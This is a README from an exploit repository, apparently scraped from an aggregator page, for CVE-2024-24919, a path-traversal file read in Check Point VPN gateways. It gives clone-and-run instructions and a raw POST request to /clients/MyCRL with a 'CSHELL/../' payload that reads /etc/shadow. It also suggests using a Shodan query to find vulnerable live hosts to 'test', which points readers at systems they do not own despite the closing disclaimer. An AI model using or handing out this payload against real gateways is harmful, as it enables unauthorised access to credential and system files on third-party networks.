## https://sploitus.com/exploit?id=79A4A59B-DC9A-594D-98BD-0081BAD8C171
# CVE-2024-24919-Exploit
## Overview
This repository contains a python exploit for the CVE-2024-24919, a vulnerability that allows you to read sensitive files from the vulnerable page.
This exploit first checks if the target is vulnerable, and then gets the path you specify.
**Severity**: Critical
## Usage
First clone the repository:
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit
Give privileges and execute the exploit with python3
chmod +x exploit.py
python3 exploit.py
Then follow the steps and you will get the data of the file you specify
If you are strugling make sure the URL you specify is the main one
✓ `https://google.com`
✘ `https://google.com/search?client=firefox`
## POC (Proof Of Concept)
First we need to make sure that the website have Check Point Security Gateways which have remote access VPN or mobile access software enabled.
In this exploit we are pointing to the `{ip}/clients/MyCRL` endpoint.
This endpoint is vulnerable if we do a POST petition, we add the string `CSHELL/` and the path of the file we want to read using a Path Traversal.
The request will be something like this:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
We get all of this looking the source code
For more information about the process check this post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
## Test
If you want to test this vulnerability you can use Sodan to find some vulnerable websites, using this query in sodan
Server: “Check Point SVN Foundation”
## References
https://nvd.nist.gov/vuln/detail/CVE-2024-24919
https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/
https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919
## Disclaimer
This script is for educational purposes only. Use it responsibly and only on systems you have permission to access.